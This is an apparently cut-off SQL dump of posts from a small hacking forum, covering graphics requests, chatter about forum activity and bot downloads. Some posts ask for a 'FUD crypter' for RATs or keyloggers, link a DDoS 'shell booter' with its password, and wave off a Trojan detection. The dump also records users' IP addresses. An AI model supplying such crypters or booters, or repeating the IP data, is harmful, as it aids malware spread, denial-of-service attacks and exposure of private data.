`mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2085', '38', '2066', '16', 'RE: [tut] How to lie like a pro', '0', '1', 't3h jok3r', '1347736470', '[quote=\'iTzIpod\' pid=\'2066\' dateline=\'1347717832\'] [quote=\'sirchamp\' pid=\'2041\' dateline=\'1347694633\'] I have that Book. Kevin Mitnick The Art of Deception. [/quote] Oh ok. I\'ll see if I can read it online. And then I will try this at school :3 [/quote] You can only find this on Amazon, you have to buy it for $10. I bought it on my Kindle.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'daf6c0137d272ff148c33f8034e0d5a8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2086', '446', '2058', '28', 'RE: This forum is dead..', '0', '1', 't3h jok3r', '1347736511', 'Sure, give me the doctors address and I will drag him in this section and also how much would the operation cost?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'c640df470af66b5d815800027962e103', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2087', '436', '2060', '7', 'RE: Motivation', '0', '1', 't3h jok3r', '1347736540', '[quote=\'iTzIpod\' pid=\'2060\' dateline=\'1347717297\'] [quote=\'t3h jok3r\' pid=\'1998\' dateline=\'1347676779\'] I think it\'s because we getting known AND schools have started so people are getting off from holidays and now staying more at home. [/quote] Yeah. If only summer was 3 months, we could\'ve had our members active a little longer. [/quote] I have no idea what you meant by that.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'a6b029d4d4e3582bfeb68798eeca6d89', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2088', '443', '2055', '42', 'RE: Apple Announces the iPhone 5', '0', '1', 't3h jok3r', '1347736881', 'Starting price is $200 atm, I heard it\'s gonna be up to $400 when it gets released. I might pre-order this.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '3f5898d599d9df83c609bfd5cd8a9361', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2089', '431', '2044', '61', 'RE: R?????zo?\'s GFX Service [FREE]', '0', '1', 't3h jok3r', '1347736992', '[quote=\'R?????zo?\' pid=\'2044\' dateline=\'1347706600\'] [quote=\'t3h jok3r\' pid=\'1979\' dateline=\'1347664425\'] Size: Dunno Colour Scheme: Black, Red, Grey, Silver or white Render/Image: http://i410.photobucket.com/albums/pp181/GraphicDanny/blank-template.png Text: Admin Anything else: This is going to be the admin userbar. [/quote] [img]http://i.imgur.com/H8PtH.png[/img] Hope you like it. Let me know if you need anything changed. [hr] [quote=\'iTzIpod\' pid=\'1960\' dateline=\'1347650771\'] 1. Thanks for contributing to Unique. =] But I\'m fine for now. =] [/quote] Heres your request, hope you like it: [img]http://i.imgur.com/cEFV6.gif[/img] [/quote] Thanks, I like the text but the icon doesn\'t look good.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'e9a4ff279a1caaef449ed6246f4d09d9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2090', '437', '2046', '3', 'RE: Help keep LH up', '0', '1', 't3h jok3r', '1347737042', '[quote=\'iTzIpod\' pid=\'2046\' dateline=\'1347711336\'] [quote=\'t3h jok3r\' pid=\'2035\' dateline=\'1347683967\'] [quote=\'iTzIpod\' pid=\'2020\' dateline=\'1347679116\'] [quote=\'t3h jok3r\' pid=\'2019\' dateline=\'1347678869\'] Website Viewer? And fixed the link to L33THacking.net [/quote] As long as it\'s an adf.ly link and someone clicks on it, you still get money. :p [/quote] I have no idea what you are talking about. [/quote] I meant. l33thacking.net was still an Adf.ly link. And so if someone clicks on it, you can still get money. O_o But you changed it to L33thacking.net now so it doesn\'t matter. [/quote] Oh OK, it\'s better to have it redirect to the new LH site because then we can even get more members.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '2ad5d8af5e5df3070b65d4305462d549', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2092', '436', '2087', '7', 'RE: Motivation', '0', '82', 'iTzIpod', '1347741423', '[quote=\'t3h jok3r\' pid=\'2087\' dateline=\'1347736540\'] [quote=\'iTzIpod\' pid=\'2060\' dateline=\'1347717297\'] [quote=\'t3h jok3r\' pid=\'1998\' dateline=\'1347676779\'] I think it\'s because we getting known AND schools have started so people are getting off from holidays and now staying more at home. [/quote] Yeah. If only summer was 3 months, we could\'ve had our members active a little longer. [/quote] I have no idea what you meant by that. [/quote] If our summer break was longer, we would\'ve had an opportunity to have more active members..', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '78365c1c27508f1691cbe4c058d876ea', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2093', '448', '2083', '61', 'RE: Broken Links', '0', '82', 'iTzIpod', '1347741724', '[quote=\'t3h jok3r\' pid=\'2083\' dateline=\'1347736285\'] I have a quick question, why is this closed? [/quote] I closed it because I thought it was loud and clear for anyone to understand.. So if they see a broken link, then they will report it to me. And I will fix the link', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'f71ef8ea325c3a05bd9df00dc8799b05', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2094', '446', '2086', '28', 'RE: This forum is dead..', '0', '82', 'iTzIpod', '1347742303', '[quote=\'t3h jok3r\' pid=\'2086\' dateline=\'1347736511\'] Sure, give me the doctors address and I will drag him in this section and also how much would the operation cost? [/quote] Aha t3h jok3r, you\'re so funny... :roflol: Not :grrr:', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '626ab6e0161611b71afa737d773c2c05', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2095', '56', '2078', '15', 'RE: Tubeonia [ Best Youtube Bot ]', '0', '82', 'iTzIpod', '1347742784', '[quote=\'GRONgamer61\' pid=\'2078\' dateline=\'1347725374\'] <3 this is awesome thanks bro [hr] Er, could you post a direct download? [/quote] Isn\'t DepositFiles a direct download? O_o EDIT: Oh. The download link is broken..', '24.212.197.164', '416597412', '1', '0', '82', '1347742840', '1', '600c5702a444ff9b0bd1da4f28ca7aef', '0', '1347742840'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2096', '92', '2079', '15', 'RE: [FREE Leaked Download] RhinoTube || #1 Free Youtube bot||', '0', '82', 'iTzIpod', '1347742927', '[quote=\'GRONgamer61\' pid=\'2079\' dateline=\'1347725601\'] Awesome downloading now. Thanks [hr] Doesn\'t work </3 thanks anyway. [/quote] What do you mean it doesn\'t work? I just downloaded it. Or did you mean the file doesn\'t work?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '2e87c18af8b492a0549902c012a39990', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2097', '289', '1354', '15', 'RE: UploadNSell Exploit Program', '0', '82', 'iTzIpod', '1347743128', 'Ughh. Keep on getting the 1 month XBL thing.. It\'s just a text file saying that he needs to PM him about it or something -.-', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '9dda0a93c228eac776407e142949a690', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2098', '38', '2085', '16', 'RE: [tut] How to lie like a pro', '0', '82', 'iTzIpod', '1347743298', '[quote=\'t3h jok3r\' pid=\'2085\' dateline=\'1347736470\'] [quote=\'iTzIpod\' pid=\'2066\' dateline=\'1347717832\'] [quote=\'sirchamp\' pid=\'2041\' dateline=\'1347694633\'] I have that Book. Kevin Mitnick The Art of Deception. [/quote] Oh ok. I\'ll see if I can read it online. And then I will try this at school :3 [/quote] You can only find this on Amazon, you have to buy it for $10. I bought it on my Kindle. [/quote] I already read the book :o I think.. Is this it? http://mitnicksecurity.com/media/CSC-Testimonial.pdf', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'd40c96687e4d97e9421cfede37f7eed0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2099', '385', '2082', '19', 'RE: Discussion', '0', '82', 'iTzIpod', '1347743349', '[quote=\'GRONgamer61\' pid=\'2082\' dateline=\'1347735593\'] DONT LEAVE BRAH DONT DO IT [/quote] :p Made me LOL. Why? Can you explain?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'cd279b17426bf769687853aa64cfaed1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2100', '447', '2084', '7', 'RE: 2000 Posts', '0', '82', 'iTzIpod', '1347743409', '[quote=\'t3h jok3r\' pid=\'2084\' dateline=\'1347736421\'] Yippeeeeee. Thanks a lot everyone. I highly appreciate it, the day we get 500 threads I will give out something for free to the whole community. [/quote] I wonder what that is.. :p', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '27fe7fbd3a6cca96332c30c88e7642db', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2101', '443', '2055', '42', 'RE: Apple Announces the iPhone 5', '0', '82', 'iTzIpod', '1347743858', 'I know right? That\'s really expensive...', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '42c51493889e06fdb17ebada40dfd304', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2102', '431', '1957', '61', 'RE: R?????zo?\'s GFX Service [FREE]', '0', '82', 'iTzIpod', '1347744004', 't3h jok3r, why not just look for an icon. And then post the icon here. So he can use the same text + the icon of your liking. OT: Thanks Reloadzor for making me this animated signature. Thanks for changing the font too. <3 Vouch for legit and awesome and fast service <3', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '0f298731551bc89b892b8e193c0bb403', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2103', '431', '2102', '61', 'RE: R?????zo?\'s GFX Service [FREE]', '0', '1', 't3h jok3r', '1347745224', '[quote=\'iTzIpod\' pid=\'2102\' dateline=\'1347744004\'] t3h jok3r, why not just look for an icon. And then post the icon here. So he can use the same text + the icon of your liking. OT: Thanks Reloadzor for making me this animated signature. Thanks for changing the font too. <3 Vouch for legit and awesome and fast service <3 [/quote] Yeah, but if I pick a icon and that doesn\'t turn out to look good then his efforts might go into waste.', '173.245.64.29', '-1376436195', '1', '0', '0', '0', '1', '4c65bd5048d930130dc973bf2bcad3cb', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2104', '446', '2058', '28', 'RE: This forum is dead..', '0', '55', 'Baws', '1347747814', 'Well you need more active members, it can\'t be just iTzIpod and t3h jok3r', '98.176.49.100', '1655714148', '0', '0', '0', '0', '1', '307f5b11ef72c4cc4c28f18baf9b9d4f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2105', '446', '2058', '28', 'RE: This forum is dead..', '0', '82', 'iTzIpod', '1347748250', 'Baws, be active then. Or atleast, try. =]', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '0356458ffd8db0e776c83cdb78ec6bf0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2106', '446', '2058', '28', 'RE: This forum is dead..', '0', '1', 't3h jok3r', '1347748611', 'I agree with Baws and he had some work to do @ iTzIpod. He was the first active member on LH.', '173.245.64.29', '-1376436195', '1', '0', '0', '0', '1', 'b5f306928286c7d8d7ac3e05b148fbf7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2107', '383', '1765', '29', 'RE: Paypal Withdrawy to cash or debit card [TUT DL]', '0', '5', 'Timmy', '1347748728', 'Thanks for the direct download links.', '173.245.64.29', '-1376436195', '1', '0', '0', '0', '1', '42b7ce347f5ed4aa18bca5496b334e84', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2108', '413', '1899', '29', 'RE: EARN $50/HOUR EASILY', '0', '5', 'Timmy', '1347748778', 'Is it auto and can you fix the codes?', '173.245.64.29', '-1376436195', '1', '0', '0', '0', '1', '664a7ab4c04fcbd6c89cc15ffb2d6805', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2109', '446', '2105', '28', 'RE: This forum is dead..', '0', '55', 'Baws', '1347749164', '[quote=\'iTzIpod\' pid=\'2105\' dateline=\'1347748250\'] Baws, be active then. Or atleast, try. =] [/quote] I\'m trying right now right? But just 3 members won\'t do it. Just so you know, you\'re in 8th grade, I\'m in 11th. You have no idea how much I have, first week of school and we gotta essay already. They give us articles and a prompt, that\'s it, then you gotta do the essay. Not that easy.', '98.176.49.100', '1655714148', '0', '0', '0', '0', '1', '79e7c64f030522f1f4f25f0e87a1c3d4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2110', '450', '0', '20', 'Anyone got a good crypter?', '0', '5', 'Timmy', '1347749482', 'I need a FUD crypter for RATs or Keyloggers', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '359dadedf9db2d0ca2879d80672d6984', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2111', '451', '0', '19', '[Junk][Junk][Recently Created]Free working shell booter', '0', '5', 'Timmy', '1347749580', 'fuck hell, releasing password now: haxed [align=center]------------------------------------------------[/align] [align=center][b]LINKS:[/b][/align] [align=center][url=http://www.2shared.com/file/dL7LMgiP/ShellBooter.html]Download the ShellBooter from here.[/url][/align] [align=center][url=https://www.virustotal.com/file/067b3d41f5e4f27592fb186f5038d13721a1270a89f6b106ffcfb9b3bc7696dc/analysis/1345721125/]Click here for see virusTotal[/url][/align]', '72.231.24.165', '1223104677', '1', '0', '5', '1347749609', '1', 'aba4ebebb2a8adb6396c99bb59237345', '0', '1347749609'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2113', '38', '2098', '16', 'RE: [tut] How to lie like a pro', '0', '1', 't3h jok3r', '1347757194', '[quote=\'iTzIpod\' pid=\'2098\' dateline=\'1347743298\'] [quote=\'t3h jok3r\' pid=\'2085\' dateline=\'1347736470\'] [quote=\'iTzIpod\' pid=\'2066\' dateline=\'1347717832\'] [quote=\'sirchamp\' pid=\'2041\' dateline=\'1347694633\'] I have that Book. Kevin Mitnick The Art of Deception. [/quote] Oh ok. I\'ll see if I can read it online. And then I will try this at school :3 [/quote] You can only find this on Amazon, you have to buy it for $10. I bought it on my Kindle. [/quote] I already read the book :o I think.. Is this it? http://mitnicksecurity.com/media/CSC-Testimonial.pdf [/quote] No. A book can\'t consist of 2 pages, the book is like 200 pages long.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '8fc228337027523d02ac3a120e84f400', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2114', '439', '2051', '58', 'RE: Unique - Recruitment', '0', '1', 't3h jok3r', '1347757551', 'Please include your userbar, ficon and if can then a logo or signature of the Unique Group.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '216a8968b9b244260dde989ef497606a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2296', '441', '2295', '61', 'RE: Adf.ly Bot + Adfoc.us Bot', '0', '82', 'iTzIpod', '1347939716', '[quote=\'t3h jok3r\' pid=\'2295\' dateline=\'1347938985\'] [quote=\'iTzIpod\' pid=\'2115\' dateline=\'1347765139\'] [quote=\'t3h jok3r\' pid=\'2112\' dateline=\'1347756651\'] Trojan? Can you explain why the virus results detected a Trojan? [/quote] It\'s a fake [/quote] It\'s a fake what? [/quote] It\'s a fake/false report. Also, just run it in Sandboxie.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '24b66a3734299e3253d3c4655938bf90', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2116', '38', '2113', '16', 'RE: [tut] How to lie like a pro', '0', '82', 'iTzIpod', '1347765694', '[quote=\'t3h jok3r\' pid=\'2113\' dateline=\'1347757194\'] [quote=\'iTzIpod\' pid=\'2098\' dateline=\'1347743298\'] [quote=\'t3h jok3r\' pid=\'2085\' dateline=\'1347736470\'] [quote=\'iTzIpod\' pid=\'2066\' dateline=\'1347717832\'] [quote=\'sirchamp\' pid=\'2041\' dateline=\'1347694633\'] I have that Book. Kevin Mitnick The Art of Deception. [/quote] Oh ok. I\'ll see if I can read it online. And then I will try this at school :3 [/quote] You can only find this on Amazon, you have to buy it for $10. I bought it on my Kindle. [/quote] I already read the book :o I think.. Is this it? http://mitnicksecurity.com/media/CSC-Testimonial.pdf [/quote] No. A book can\'t consist of 2 pages, the book is like 200 pages long. [/quote] A book that consists of 2 pages is an awesome book. A book with 200 pages. Meg. I don\'t like reading a lot.. :/ I\'ll pass on the book', '50.101.171.181', '845523893', '1', '0', '0', '0', '1', 'a7902755a96dc9e06175885ed9f70c92', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2117', '450', '2110', '20', 'RE: Anyone got a good crypter?', '0', '62', 'R?????zo?', '1347778564', 'Im in need of one too, for rat mostly', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '5ba15325a547de420796716f25aca53b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2118', '431', '2103', '61', 'RE: R?????zo?\'s GFX Service [FREE]', '0', '62', 'R?????zo?', '1347778640', '[quote=\'t3h jok3r\' pid=\'2103\' dateline=\'1347745224\'] [quote=\'iTzIpod\' pid=\'2102\' dateline=\'1347744004\'] t3h jok3r, why not just look for an icon. And then post the icon here. So he can use the same text + the icon of your liking. OT: Thanks Reloadzor for making me this animated signature. Thanks for changing the font too. <3 Vouch for legit and awesome and fast service <3 [/quote] Yeah, but if I pick a icon and that doesn\'t turn out to look good then his efforts might go into waste. [/quote] if you liked the font I will post like 3-5 versions with different icons when I got the time later. you will pick the best :)', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '5ce20df4174a5ca3a8c8d035cca5c25c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2119', '449', '2074', '35', 'RE: Kratos God Of War Signature/Tag', '0', '172', 'MistaCode', '1347791291', 'Looks good! My rating would be 10/10 ;)', '88.193.83.195', '1489064899', '0', '0', '0', '0', '1', '935b3fd91197dbae40ed7e410ef680a2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2120', '370', '1874', '35', 'RE: Basic L33THACKING logo (just an basic one)', '0', '172', 'MistaCode', '1347791339', '[quote=\'R?????zo?\' pid=\'1874\' dateline=\'1347548689\'] [quote=\'t3h jok3r\' pid=\'1761\' dateline=\'1347248932\'] Just saw this thread. Logo is kinda basic, thanks for your input though. I check it and doesn\'t look good on the site but if you can make a better one then I can give that one a try too. [/quote] if you looking for a logo I can try and make something fancy? [/quote] No, im not looking for logo :D im just making an logo ;)', '88.193.83.195', '1489064899', '0', '0', '0', '0', '1', '75dacdb2a6b435c3ec6e19cd9de13aad', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2121', '452', '0', '29', '[EASY] ??How To Get $20+ Checks From Hershey\'s!??[eBook]', '0', '172', 'MistaCode', '1347792841', '[align=center][img]http://www.livingondividends.com/wp-content/uploads/2009/09/hersheys-text-based-logo.png[/img] [size=medium]In this eBook I will show you how to get $20+ in check form from Hershey\'s. I have done this quite a few times, and have maxed out $60. All of the money will come in check form. No coupons, no CompanyCash, 100% Real money. [url=https://dl.dropbox.com/u/61362288/How%20to%20Get%20%20%2420%2B%20Checks%20from%20Hershey.pdf][img]http://i.imgur.com/sMtZF.png[/img][/url] [img]http://findicons.com/files/icons/1994/vista_style_business_and_data/128/key2.png[/img] [color=#32CD32]Pass for PDF[/color] [b]thanks[/b] [/size] [/align]', '88.193.83.195', '1489064899', '0', '0', '172', '1347811462', '1', '65a90486d2ad3066dc3e2f08e2903811', '0', '1347811462'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2122', '449', '2074', '35', 'RE: Kratos God Of War Signature/Tag', '0', '62', 'R?????zo?', '1347795298', 'Looks awesome, did you made it yourself? I would rate 9/10, would look perfect with a fading border.', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '9e0f9d7ab6dee3ef5831c325d0ebeb92', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2123', '289', '1354', '15', 'RE: UploadNSell Exploit Program', '0', '67', 'HoverCatz', '1347796238', 'yes cuz its a guy that is uploading it with a program that does it automacitly every 1 min or something.', '178.74.56.137', '-1303758711', '1', '0', '0', '0', '1', 'fa39d13d7d95c3e24acd2de05be55661', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2124', '452', '2121', '29', 'RE: [EASY] ??How To Get $20+ Checks From Hershey\'s!??[eBook]', '0', '53', 'sirchamp', '1347796988', 'the password doesnt work.', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', '3baaef0fb58e6c3e895bfed639fb8f44', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2125', '451', '2111', '19', 'RE: [Recently Created]Free working shell booter', '0', '67', 'HoverCatz', '1347797372', 'Explain how i get it to work?', '178.74.56.137', '-1303758711', '1', '0', '0', '0', '1', '011e0bd757e41797fd0a922d55243355', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2126', '388', '1781', '52', 'RE: Request for the coders group', '0', '67', 'HoverCatz', '1347797455', 'dont enter 